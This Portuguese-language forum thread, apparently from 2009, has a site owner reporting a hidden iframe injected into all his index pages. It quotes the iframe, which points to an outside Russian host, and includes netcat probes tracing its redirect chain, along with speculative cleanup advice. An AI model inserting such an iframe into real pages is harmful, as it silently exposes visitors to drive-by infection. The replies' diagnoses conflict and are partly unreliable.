hacker :: iframe

[Fernando José 0]

Pessoal,

 

Em todas as páginas index.html e index.php do meu site apareceu o seguinte codigo.

 

<iframe src="http://a3l.ru:8080/ts/in.cgi?pepsi85" width=125 height=125 style="visibility: hidden"></iframe>

 

É algum tipo de vírus! Agora a duvida, como isso foi parar no meu codigo!?

 

Abraço.

[Will Fernando 2]

sim acho que deve ser um virus.. a um tempo atras estava sendo frequente isto... se procurar nos topicos antigos ira encontrar casos como o seu.. nao lembro qual o procedimento correto.. mas acho que deve ser ... remover os codigos.. limpar o pc.. trocar as senhas.. ou algo assim ^^

 

valww =]

[Fernando Nito 1]

Pelo o que sei, isso ocorre em alguma brecha em página de cadastro ou algo do gênero.

Além das coisas que o Will Fernando disse, revise a segurança do site.

[kaplan 0]

da um checada nos micros que acessam o ftp, ve se eles não tem virus.

Isto aconteceu comigo, so mudar as senhas de ftp não vai resolver

 

http://forum.imasters.com.br/public/style_emoticons/default/thumbsup.gif

[Will Fernando 2]

da um checada nos micros que acessam o ftp, ve se eles não tem virus.

como eu disse.. "limpar o pc.."

 

Pelo o que sei, isso ocorre em alguma brecha em página de cadastro ou algo do gênero.

nao so nas paginas de cadastro.. mas pode haver falhas desse tipo em todo o sistema.. tornando este vulneraveis principalmente a SQL Injection e XSS . fica como dica do nosso amigo fernando ^^

 

 

valww =]

[André D. Molin 15]

Qual o teu host?

[Fernando José 0]

Qual o teu host?

LOCAWEB

[jhoy_source 0]

Amigo isto é conhecido como auto infect, toda pessoa que entrar no seu site estará se infectando com o vírus que esta página deve conter, dificilmente foi causado por sql injection, tem mais chances de ter sido xss mas também parece improvável estude bem brechas no seu código e procure formatar os pcs que acessam o ftp, também tente contactar o host para saber se houve alguma tentativa de invasão do mesmo, mas se houve e obtiveram sucesso sinto dizer-te que eles dificilmente irão admitir isso.

[quintelab 91]

Fernando José, o título do seu tópico vai contra a 9ª regra do fórum. Peça para algum moderador alterar ou faça caso consiga.

Regras do Fórum iMasters

 

 

Abraços...

[Will Fernando 2]

ok fiz a alteração ... nao era nada muito extrapolante mas igualmente ia contra as regras do forum.. *nao pode usar caixa alta nos titulos..

 

valw =]

[eibon 2]

Amigo isto é conhecido como auto infect, toda pessoa que entrar no seu site estará se infectando com o vírus que esta página deve conter, dificilmente foi causado por sql injection, tem mais chances de ter sido xss mas também parece improvável estude bem brechas no seu código e procure formatar os pcs que acessam o ftp, também tente contactar o host para saber se houve alguma tentativa de invasão do mesmo, mas se houve e obtiveram sucesso sinto dizer-te que eles dificilmente irão admitir isso.

Só o IE por causa do nosso querido ActiveXObject e o Netscape (antigo) permite esse tipo de coisa...(tirando browsers com plugins dentre outras exceções).

E as páginas não tem nada de suspeito não...veja o resultado dos testes que realizei:

singur@eibonHost:~$ nc a3l.ru 8080
GET /ts/in.cgi?pepsi85 HTTP/1.1
Host: a3l.ru
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 

HTTP/1.1 302 Found
Server: nginx
Date: Thu, 02 Jul 2009 05:22:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: SL_pepsi85_0000=_10000_; domain=traffcount.cn; path=/; expires=Fri, 03-Jul-2009 05:21:35 GMT
Set-Cookie: TSUSER=pepsi85; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/; domain=traffcount.cn
Set-Cookie: SL_default_0000=_1_; domain=traffcount.cn; path=/; expires=Fri, 03-Jul-2009 05:21:35 GMT
Location: http://c3q.at:8080/index.php

b8
<html>
<head>
<meta http-equiv="REFRESH" content="1; URL='http://c3q.at:8080/index.php'">
</head>
<body>
document moved <a href="http://c3q.at:8080/index.php">here</a>
</body>
</html>

0

singur@eibonHost:~$ nc c3q.at 8080
GET /index.php HTTP/1.1
Host: c3q.at
User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Jul 2009 05:23:45 GMT
Content-Type: text/html
Connection: close
Expires: 0
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Length: 0

singur@eibonHost:~$

---

As possibilidades são muitas...é impossivel dizer ao certo sem fazer vários testes...

[Rafael Wapbrasil 1]

Dei uma olhada, nao parece nenhum tipo de virus. Parece ser algum serviço de contador ou aqueles que pagam por cliques que esta benefiando algum usuario com nick 'pepsi'. Mais de onde isto apareceu no seu script? Posta os codigos e tambem diz se aparece so no seu pc, so na sua hospedagem, ou nos dois